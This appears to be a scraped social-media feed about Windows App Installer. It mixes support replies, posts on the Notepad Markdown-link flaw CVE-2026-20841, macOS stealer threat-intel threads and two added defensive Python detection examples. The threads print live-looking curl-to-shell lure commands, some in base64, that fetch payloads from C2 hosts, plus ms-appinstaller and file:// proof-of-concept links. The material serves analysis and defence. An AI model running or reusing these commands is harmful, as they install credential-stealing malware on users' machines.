Replying to @DenelonMs
Do you know what is the best way to get an MSIX app deployed to RDS users on Windows Server 2022, when the MSIX app is in the Microsoft Store and not using appinstaller as a separate way to deploy the app?
2
149
Nyxian, a fully on-device iOS FOSS native-code IDE that works on the latest non-jailbroken iOS, will soon get support for Swift 6.3 using the latest iOS SDK! Stay tuned🔥🔥 Make sure to follow @KyleSwifter and @AppInstalleriOS; without them this wouldn't be possible (yes, appinstaller didn't actively help on Nyxian 0.10, but the technique he used in FridaCodeManager helped Nyxian!)
2
5
59
7,819
Replying to @AkJinpachi
If you download the .appinstaller package it's free. It's more like "if you'd like, please support us via the MS Store version or on GitHub". It's $10, so I do think it's a fair price.
2
2
70
A retry button when installing .appinstaller files would be nice
1
2
31
5,772
[Heads-up] Notepad's "Markdown feature" caused an RCE (roughly, a dangerous bug)! If you use it at work, update right now!
First of all, if you use Notepad for work, please update before reading on. The reposted source is information about a bug in Notepad's "Markdown feature", which became available in a recent Notepad update. I'll summarize the key points, so update first and then see what happened!
Bottom line: it's not the AI. The Markdown link handling was lax, and the bug let dangerous URIs (something like the location where a file is stored) be executed. You can mitigate it right now by updating Notepad.
① What happened
Links written in Markdown were executed as-is when you opened the HTML preview and clicked them. Example: a link like [test](file://C:/test.exe). The problem was that URIs that should have been treated as "just text" were passed straight to a mechanism called ShellExecuteExW(). The reproduction condition is "open a Markdown file and click a link in the HTML preview". Simply viewing a note does not trigger it.
② Which URIs are dangerous?
・file:// → a local executable may be launched
・ms-appinstaller:// → leads the user into installing an app
In other words, it's an attack that relies on getting you to click a link. If it arrives by email or via a shared file, some people will naturally fall for it. The CVSS score (severity) is 7.8/10.0 (High). Leaving it unpatched is not recommended.
③ AI is not involved
Lately it tends to be called the "AI-powered Notepad", but this time the cause is not the AI feature but the Markdown support. So the lesson is not "AI is scary" but "link handling was lax".
④ Already fixed
In the patched version dangerous URIs are escaped, and clicking them does not execute anything. If you use Windows normally and automatic updates from the Microsoft Store are enabled, you're basically fine already. But please double-check just in case.
■ How to check whether Notepad is up to date
・Open the Microsoft Store
・Press "Library" → "Get updates"
・Check that Notepad is up to date
While you're at it, it's reassuring to get into the habit of not previewing suspicious .md files right away. To sum up: there was a "design mistake that executed Markdown links as-is", but "it's now fixed". Generative AI has become widespread lately and .md files are becoming more common, so be careful.
Notepad's arbitrary code execution vulnerability stems from the Markdown feature, not from AI: ZDI explains / update to the patched version forest.watch.impress.co.jp/d…
1
3
3,654
Replying to @vxunderground
I don't fully understand how this is an RCE. The POC shows ms-appinstaller:// and file:// being used. App Installer is disabled by default and file:// doesn't allow arguments. If this is seen as an RCE, then don't we also have an RCE through hyperlinks in the Terminal app?
2
134
A serious flaw was found in Windows 11 Notepad and has been fixed: merely clicking a crafted Markdown link executed a program without any warning. Malicious code could have run with the user's own privileges. Via special links, external files could also be launched. The issue, fixed on February's Patch Tuesday, is tracked as CVE-2026-20841 and was a flaw that allowed an unauthorized protocol to be launched via command injection. An attacker could embed URIs such as file:// or ms-appinstaller:// in a Markdown-format .md file and, just by getting the victim to Ctrl-click the link, launch executables or programs on remote shares without any warning. Affected are versions 11.2510 and earlier; previously no confirmation dialog was shown even for links other than http or https. It has now been changed so that a warning appears when opening schemes such as file, ms-settings, mailto and ms-search, and it is updated automatically via the Microsoft Store. bleepingcomputer.com/news/mi…
78
172
13,986
Replying to @nsg650
More like ms-appinstaller://?source=evilpayload.xyz to install an untrusted app

1
10
816
[poc](ms-appinstaller://?source=https://evil/xxx.appx).md no shit. This is the PoC
It's finally here Windows Notepad App Remote Code Execution Vulnerability 😂 msrc.microsoft.com/update-gu…
6
20
158
26,301
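The posts above describe the fix as escaping link targets whose scheme is not http or https so the preview cannot hand them to the shell. The following is an added example, not code from Notepad or from any of the posters, of the same idea as a defender-side check: it extracts inline links and autolinks from Markdown text, reports any target whose scheme is outside an allowlist, and can rewrite such links as plain text. The sample Markdown and its hostnames (example.test) are constructed for the demonstration; the control-character stripping is an assumed conservative normalization, not a description of how Notepad parses links.

```python
import re

# Schemes a preview may open without a warning (assumption for this example).
# Anything else, file, ms-appinstaller, ms-settings, mailto and so on, is reported.
ALLOWED_SCHEMES = frozenset({"http", "https"})

# Inline links: [text](target "optional title")   Autolinks: <scheme:...>
_INLINE_LINK = re.compile(r"\[([^\]]*)\]\(\s*<?([^\s)>]+)>?(?:\s+\"[^\"]*\")?\s*\)")
_AUTOLINK = re.compile(r"<([A-Za-z][A-Za-z0-9+.-]*:[^\s>]*)>")
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")
_CONTROL = re.compile(r"[\x00-\x20]")  # control characters and spaces a lax parser might skip


def link_scheme(target):
    """Return the lower-cased scheme of a link target, or '' for a relative link."""
    cleaned = _CONTROL.sub("", target)  # conservative: strip anything that could hide a scheme
    m = _SCHEME.match(cleaned)
    return m.group(1).lower() if m else ""


def find_links(markdown):
    """Yield (line_number, target) for every inline link and autolink in the text."""
    for lineno, line in enumerate(markdown.splitlines(), start=1):
        for m in _INLINE_LINK.finditer(line):
            yield lineno, m.group(2)
        for m in _AUTOLINK.finditer(line):
            yield lineno, m.group(1)


def audit_markdown(markdown, allowed=ALLOWED_SCHEMES):
    """Return [(line_number, scheme, target)] for links whose scheme is not allowed.

    Relative links (no scheme) are accepted; unknown or custom schemes are reported
    so the renderer can escape them or show a warning before opening anything."""
    findings = []
    for lineno, target in find_links(markdown):
        scheme = link_scheme(target)
        if scheme and scheme not in allowed:
            findings.append((lineno, scheme, target))
    return findings


def neutralize(markdown, allowed=ALLOWED_SCHEMES):
    """Rewrite links with disallowed schemes as plain, backtick-quoted text."""
    def keep(target):
        scheme = link_scheme(target)
        return not scheme or scheme in allowed

    def inline_repl(m):
        text, target = m.group(1), m.group(2)
        return m.group(0) if keep(target) else f"{text} (`{target}`)"

    def auto_repl(m):
        return m.group(0) if keep(m.group(1)) else f"`{m.group(1)}`"

    out = []
    for line in markdown.splitlines():
        line = _INLINE_LINK.sub(inline_repl, line)
        line = _AUTOLINK.sub(auto_repl, line)
        out.append(line)
    return "\n".join(out)


# Constructed sample document: two benign links, then four that a preview must not open.
SAMPLE_MD = """# Release notes
See the [docs](https://example.test/docs) and the [changelog](CHANGELOG.md).
[test](file://C:/test.exe)
[installer](ms-appinstaller://?source=https://example.test/app.appx)
<MS-SETTINGS:display>
[spaced]( FILE:///C:/Windows/System32/calc.exe )
"""

if __name__ == "__main__":
    for lineno, scheme, target in audit_markdown(SAMPLE_MD):
        print(f"line {lineno}: scheme {scheme!r} not allowed: {target}")
    print(neutralize(SAMPLE_MD))
```

Scheme matching is case-insensitive and tolerates leading whitespace inside the parentheses, because an allowlist that only recognises lower-case `file://` is easy to slip past; the safe default for anything the allowlist does not name is to treat it as text rather than to try to enumerate bad schemes.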
Updates are automatic for Windows. When it initially opens, the Windows Appinstaller searches for an update. You can also download the latest from our website which is 9.6.6. Mac has a search for update feature and auto update option.
1
1
45
#2/3 - MacOS malware
MacOS users get on pmacos[.]onelink[.]me/m5yY/q5vbjgvh >> cotlesgengeral[.]com >> drmcdermottmd[.]com/salt-engine.html (image 1)
This fake Github download page is serving a curl payload. The same template has been observed in the past serving other MacOS stealers.
echo "GitHub-AppInstaller: https://dl[.]github[.]com/drive-file-stream/GitHubApplicationSetup.dmg" && curl -s $(echo 'aHR0cHM6Ly9pbXBlci1zdHJsazUuY29tL2xvYWRlci5zaD9idWlsZD1jNmEzZWExMjNkOTBkMzE1NzllYmJkMzAzMWE1MGFkMQ==' | base64 -d) | zsh
Decoded to hxxps://imper-strlk5.com/loader.sh?build=c6a3ea123d90d31579ebbd3031a50ad1 (image 2) (saved 5e3aefd7668cb5eb4da18b1040847029dddb55096a922658633bc85fb5008b7a)
This bash script (b64 gunzip), once decoded, fetches and downloads a malicious applescript via osascript (image 3)
The applescript can be found here: 9191101893e419eac4be02d416e4eed405ba2055441f36e564f09c19cb26271c
Functionality of the stealer and persistence module was described in the quoted posts and comments. This applescript is a blatant copy of the MacSync functionality, using imper-strlk5[.]com/gate as C2. In the applescript we can see a reference to "SHub Stealer v2.0"
Based on the characteristics and infrastructure of this campaign, we do believe this MacOS stealer is a private custom adaptation (a nice way of saying a copy) of the MacSync Stealer applescript. Similar adaptation of the Windows builds is described in the post below.
1
1
6
1,459
Interesting MacOS infostealer campaign via Github traffic (🎩 @osint_barbie )
Spread as a fake Shimo VPN Client (image 1 - github[.]com/Browndash1368/shimo-mac-unlocked-edition) redirecting users to a fake Github download page (image 2)
browndash1368[.]github[.]io >> macos[.]aidevmac[.]com github[.]macos-developer[.]com/main
A bash script is shared:
echo "GitHub-AppInstaller: https://dl[.]github[.]com/drive-file-stream/GitHubApplicationSetup.dmg" && echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC9nejF4c2hjYnU3N29nbWd0KSI=' | base64 -d | bash
Chaining more bash script from C2 (image 3)
/bin/bash -c "$(curl -fsSL http://91[.]92[.]242[.]30/gz1xshcbu77ogmgt)"
Then downloading and executing a malicious Mach-O (image 4)
Looking at strings inside the Mach-O, there is a reference to "macos-stealer-v2"
IOCs
a0e66f3067e4aaf5b83e45b7845cc43b2fc96032a4398cab7cc9d11f4f962e91 (this thread)
ab267488d2c0a6300b61b5c9046cb86fe4a9ac3fe9a615acd374465b3a4b26c2 (older)
5
16
70
5,963
4 Dec 2025
For those whose facial tracking has gone wrong since the VRCFaceTracking update, try unchecking it as in the picture below, or uninstall the Steam version of VRCFaceTracking, go to github.com/benaclejames/VRCF…, download VRCFaceTracking_x64.appinstaller, manually set the clock to before March 2025, then install it to downgrade.
8
50
269
23,825
16 Nov 2025
You'll have to pin it to your task bar to open it. If not using the Installer file to open it would be the current solution. The issue is that Windows Appinstaller is getting broken causing Meld to not open properly or connect to the integrations. The devs, including @__constexpr, are working on a way to move away from AppInstaller or a fix until Microsoft can roll out the update for it.
1
2
712
12 Oct 2025
This means one of a few things
- Windows is not fully up to date: Make sure there are NO updates for Windows or Appinstaller via the Microsoft Store
- You have an Antivirus that is false positively blocking Meld: Whitelist Meld or delete the antivirus as the built in Microsoft Defender one is pretty dang good.
- Windows/Appinstaller is corrupted: Repair Windows
If none of those work, DM and I'll get you set up ASAP
2
6
559
PSA to devs using Desktop Bridge/Project Reunion: Microsoft is killing the VCLibs dependency download links in the future (e.g., aka-ms/Microsoft.VCLibs.arm64.14.00.Desktop.appx). This impacts my .appinstaller distribution channel. Hmm. learn.microsoft.com/en-us/tr…
4
1
11
2,049
🚀 Flekstore iOS just got a MAJOR upgrade! 🎯 Install apps, games & tweaks with NO PC & NO REVOKE! 🔥 Don’t miss this game-changer! 📲 Watch now 👉 youtu.be/-voRANRBqqc #Flekstore #iOS #AppInstaller #TechjunkieAman #NoPC #NoRevoke #iOSApps
2
5
18
2,600
28 Jun 2025
Living Off the Land - #AppInstaller Abuse on #Windows
A lesser-known LOLBAS technique involving AppInstaller.exe, a legitimate tool designed to install .appx and .msix application packages on Windows 10 and 11. AppInstaller can be misused to silently download and execute payloads from remote sources using specially crafted .appinstaller manifests.
---
⚙️ #Exploitation Mechanism
By leveraging the ms-appinstaller URI scheme, adversaries can invoke ms-appinstaller. This triggers a download of the associated .msix file into the user's INetCache and prompts installation, executing embedded binaries like calc.exe under user-level privileges.
This misuse aligns with #MITRE ATT&CK T1105: Ingress Tool Transfer, providing a stealthy method for tool delivery that often bypasses traditional download detections.
---
🧪 Proof of Concept - #PoC
A full working PoC has been scripted using:
> makeappx.exe and signtool.exe from the Windows ADK.
> A self-signed certificate for sideloading.
> A Python-hosted web server serving both the .msix and .appinstaller.
This chain leads to the execution of a trojanized package impersonating legitimate software. The exploit requires no elevated privileges and operates under a standard user context, significantly lowering the barrier for exploitation in real-world scenarios.
- github.com/Logisek/CalcOrItD…
---
🔍 #Detection & #Mitigation
You should focus on:
> DNS queries from AppInstaller.exe.
> Suspicious use of the ms-appinstaller protocol.
> Files dropped in INetCache with .appinstaller and .msix extensions.
> Completely blocking the ms-appinstaller protocol if it is not needed.
- logisek.com
#CyberSecurity #LOLBAS #OffensiveSecurity #RedTeam #PenetrationTesting #BlueTeam #InfoSec #Offsec #Logisek
1
3
285
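The detection list in the post above (DNS queries from AppInstaller.exe, use of the ms-appinstaller protocol, package files landing in INetCache) maps directly onto Sysmon event types 22 (DNSQuery), 1 (ProcessCreate) and 11 (FileCreate). The following is an added example, not code from the post or from the Logisek repository, of those three checks run over a few constructed Sysmon-style JSON lines; the user name, hostnames, hash-like folder names and the shortened WindowsApps path are all made up for the demonstration, and the rule names are this example's own.

```python
import json
import re
from pathlib import PureWindowsPath

APPINSTALLER_IMAGE = "appinstaller.exe"
# Package types App Installer stages before installing (assumption: include the bundle variants).
STAGING_EXTS = {".appinstaller", ".msix", ".msixbundle", ".appx", ".appxbundle"}
INETCACHE = re.compile(r"\\INetCache\\", re.IGNORECASE)
PROTOCOL = re.compile(r"\bms-appinstaller:", re.IGNORECASE)


def is_appinstaller(image):
    """True when the process image is AppInstaller.exe, wherever it lives."""
    return PureWindowsPath(image).name.lower() == APPINSTALLER_IMAGE


def check_event(ev):
    """Return [(rule, detail)] for one Sysmon-style event dict (EventID, Image, ...)."""
    hits = []
    event_id = ev.get("EventID")
    image = ev.get("Image", "")
    if event_id == 1 and PROTOCOL.search(ev.get("CommandLine", "")):
        hits.append(("ms-appinstaller protocol invoked", ev["CommandLine"]))
    if event_id == 22 and is_appinstaller(image):
        hits.append(("DNS query from AppInstaller.exe", ev.get("QueryName", "")))
    if event_id == 11:
        target = ev.get("TargetFilename", "")
        if INETCACHE.search(target) and PureWindowsPath(target).suffix.lower() in STAGING_EXTS:
            hits.append(("package staged in INetCache", target))
    return hits


def scan(lines):
    """Run check_event over JSON-per-line events; return one alert dict per hit."""
    alerts = []
    for n, line in enumerate(lines, start=1):
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        for rule, detail in check_event(ev):
            alerts.append({"line": n, "rule": rule, "image": ev.get("Image", ""), "detail": detail})
    return alerts


# Constructed sample log: three events that should fire, three that should not.
# The WindowsApps folder name is shortened; a real one carries the package version.
SAMPLE_LOG = r"""{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c start ms-appinstaller:?source=https://pkg.example.test/tool.appinstaller"}
{"EventID": 22, "Image": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_x64\\AppInstaller.exe", "QueryName": "pkg.example.test"}
{"EventID": 11, "Image": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_x64\\AppInstaller.exe", "TargetFilename": "C:\\Users\\alice\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\ABCD1234\\tool[1].msix"}
{"EventID": 22, "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "QueryName": "www.example.test"}
{"EventID": 11, "Image": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "TargetFilename": "C:\\Users\\alice\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\WXYZ9876\\report[1].pdf"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.md"}
"""

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG.splitlines()):
        print(f"line {alert['line']}: {alert['rule']} <- {alert['detail']}")
```

The third rule is the noisiest in practice, because any Store or enterprise deployment that uses App Installer legitimately will also stage packages under INetCache; correlate it with the DNS rule and with the download host before treating it as more than a lead. The last item on the post's list, blocking the protocol where it is not needed, is the App Installer group policy "Enable App Installer ms-appinstaller protocol" (registry value EnableMSAppInstallerProtocol under HKLM\SOFTWARE\Policies\Microsoft\Windows\AppInstaller); with it disabled, the first rule becomes a clean indicator of something trying anyway.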
28 Jun 2025
Living off the land with AppInstaller.exe A fake signed .msix package .appinstaller file to trigger execution via ms-appinstaller (AppInstaller.py). RCE (or not, just a calc), no user prompt if trusted. github.com/Logisek/CalcOrItD… #RedTeam #Infosec #Offsec #Logisek

7
285
27 Jun 2025
All fixed up now :D Solution was to use the Add-AppxPackage request within PowerShell since AppInstaller was being a meanie butt
26 Jun 2025
Replying to @StreamWithMeld
I can’t get it downloaded, it keeps telling me it’s a virus, when it’s bypassed it tells me the file is unavailable
1
4
481